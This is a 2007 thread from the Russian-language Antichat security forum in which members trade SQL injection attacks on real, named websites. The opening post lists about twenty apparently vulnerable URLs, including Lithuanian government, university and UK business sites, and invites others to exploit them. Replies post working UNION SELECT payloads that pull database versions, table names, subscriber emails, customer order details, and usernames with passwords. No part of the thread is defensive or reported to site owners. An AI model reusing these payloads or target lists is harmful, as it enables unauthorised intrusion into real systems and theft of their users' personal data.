HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.04.2007, 20:46
genom--
Постоянный
Регистрация: 09.07.2006
Сообщений: 937
Провел на форуме:
1948091

Репутация: 1686


По умолчанию

http://www.jemjabella.co.uk/postbyid.php?id='
http://www2.bham.ac.uk/core/core_picker/download.asp?documenttable='
http://www.thecomedystore.co.uk/page.php?id='
http://www.franinfo.co.uk/exhibitors.php?id='
http://www.franinfo.co.uk/exhi_detail.php?id='
http://www.jemjabella.co.uk/postbyid.php?id='
http://www.teltonika.lt/ru/pages/view/?id='
http://www.bendruomenes.lt/news.php?id='
http://www.biuropasaulis.lt/pk/produkcija/models.php?id='
http://www.bendruomenes.lt/news.php?id='
http://www.avilys.lt/index.php?id='
http://paulauskas.president.lt/one.phtml?id='
http://www.skautai.lt/users.php?id='
http://www.skautai.lt/index.php?id='
http://kaunas.lcn.lt/arkikatedra/index.php?id='
http://www.auksinisvarnas.lt/index.php?id='
http://www.eurodesk.lt/index.php?language='
http://www.esecurity.lt/article.php?id='
http://leidykla.ktu.lt/main.php?ID='

вот щас очень занят а хотел поковырять --давайте сами =)
 
Ответить с цитированием

  #2  
Старый 05.04.2007, 21:21
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Вывод в title'е:

Код:
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10,11,12,13,14/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_name,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+20,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_column,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=char(105,99,95,115,117,98,115,99,114,105,98,101,114,115)+limit+0,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(id,char(58),email),2,3,4,5,6,7,8,9,10,11,12,13,14+from+ic_subscribers+limit+6,1/*
 
Ответить с цитированием

  #3  
Старый 05.04.2007, 21:26
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),concat(user(),0x3a,database()),5,6/*&status=1
 
Ответить с цитированием

  #4  
Старый 06.04.2007, 18:08
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от genom--  
...
http://www.bendruomenes.lt/news.php?id='
...
вот щас очень занят а хотел поковырять --давайте сами =)
Наугад выбрал:
Код:
http://www.bendruomenes.lt/news.php?id=-1+UNION+select+1,2,3,4,5,concat(version(),char(58),user()),7,8,9,10/*
А вот здесь на сайте c приветствием "Welcome to my website. My name is Jem and I'm a l33t PHP ninja." версия выводится в строку адреса:
Код:
http://www.jemjabella.co.uk/postbyid.php?id=-1+UNION+SELECT+concat(version(),char(58),user())/*
Я долго ржал.
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....

Последний раз редактировалось ShadOS; 06.04.2007 в 18:16..
 
Ответить с цитированием

  #5  
Старый 06.04.2007, 18:46
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

2ShadOS
ну тогда уж сразу вывел бы данные или это уже не в моде?
Код:
http://www.bendruomenes.lt/news.php?strid=-23412+union+select+concat(username,char(58),password)+from+users/*
 
Ответить с цитированием

  #6  
Старый 06.04.2007, 20:30
ShadOS
ы
Регистрация: 11.02.2007
Сообщений: 750
Провел на форуме:
1347723

Репутация: 1477


Отправить сообщение для ShadOS с помощью ICQ
По умолчанию

Цитата:
Сообщение от genom--  
...
http://leidykla.ktu.lt/main.php?ID='
...
а вот здесь blind. У меня опыта маловато чтобы что-то сделать дальше:
Код:
http://leidykla.ktu.lt/main.php?ID=-1)+UNION+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
__________________
..когда же кто-нибудь выпустит MD5(Unix) брутер на GPU.... жду....
 
Ответить с цитированием

  #7  
Старый 05.04.2007, 21:24
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

2genom--
Щас ковырнем малость
Цитата:
http://www.thecomedystore.co.uk/page.php?id=-2%20union%20select%201,concat(name,char(58),email) %20from%20orders/*
Цитата:
http://www.bendruomenes.lt/news.php?id=1%20union%20select%201,concat(username ,char(58),password),2,4,5,6,7,8,9,0%20from%20users/*
 
Ответить с цитированием

  #8  
Старый 05.04.2007, 21:32
_GaLs_
Постоянный
Регистрация: 21.04.2006
Сообщений: 540
Провел на форуме:
1310036

Репутация: 726


Отправить сообщение для _GaLs_ с помощью ICQ
По умолчанию

http://www.karavan-megastore.com.ua

Версия MySql:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,VERSION(),null,null
Логин текущего пользователя базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,USER(),null,null
Имя используемой базы данных:
Код:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,DATABASE(),null,null
Вот так всё простинька))

Последний раз редактировалось _GaLs_; 05.04.2007 в 21:35..
 
Ответить с цитированием

  #9  
Старый 05.04.2007, 21:32
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.payolibre.com/noticias/noticias2.php?id=-413+union+select+1,2,3,4,user(),6/*
Код:
http://www.jerashfestival.com.jo/inner.php?id=-9+union+select+version()/*
Код:
http://www.iblaw.com.jo/practice.php?id=-8+union+select+1,database(),3,4/*
 
Ответить с цитированием

  #10  
Старый 05.04.2007, 21:45
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
Провел на форуме:
1988972

Репутация: 250
По умолчанию

Код:
http://www.uris.com.ua/index.php?page=8&id=-8+union+select+1,2,concat(database(),0x3a,version()),4,5,6/*
вывод в title:
Код:
http://www.designplace.org/tutorials.php?page=1&c_id=-27+union+select+version(),2,3/*
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ